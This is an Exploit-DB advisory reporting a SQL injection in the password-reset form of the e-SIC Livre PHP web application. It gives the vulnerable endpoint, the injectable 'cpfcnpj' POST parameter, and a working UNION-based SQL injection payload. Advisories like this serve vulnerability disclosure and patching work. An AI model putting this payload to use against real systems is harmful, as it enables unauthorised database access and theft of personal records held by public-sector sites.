EDB-ID: 42981 | Author: Elber Tavares | Published: 2017-10-12 | CVE: N/A | Type: Webapps | Platform: PHP | Vulnerable App:  | 12/10/2017# Exploit Author: Elber Tavares
# fireshellsecurity.team/
# Vendor Homepage: https://softwarepublico.gov.br/# Version: 1.0#
Tested on: kali linux, windows 7, 8.1, 10 - Firefox# Download
https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
More informations:
http://whiteboyz.xyz/esic-software-publico-sql-injection.html
vulnerability is in the password reset parameter of the software,
where we can send sql parameters and interact directly with the
database. "Informe seu CPF ou CNPJ para enviarmos nova senha:"
---------------------------------------------------------------------
Url: http://vulnerablesite/esic/reset/
POST: cpfcnpj=test&btsub=Enviar
Parameter: cpfcnpj (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: cpfcnpj=test' UNION ALL SELECT NULL,NULL,CONCAT(CONCAT
('qbqqq','HMDStbPURehioEoBDmsawJnddTBZoNxMrwIeJWFR'),'qzbpq'),NULL,NULL--
GJkR&btsub=Enviar
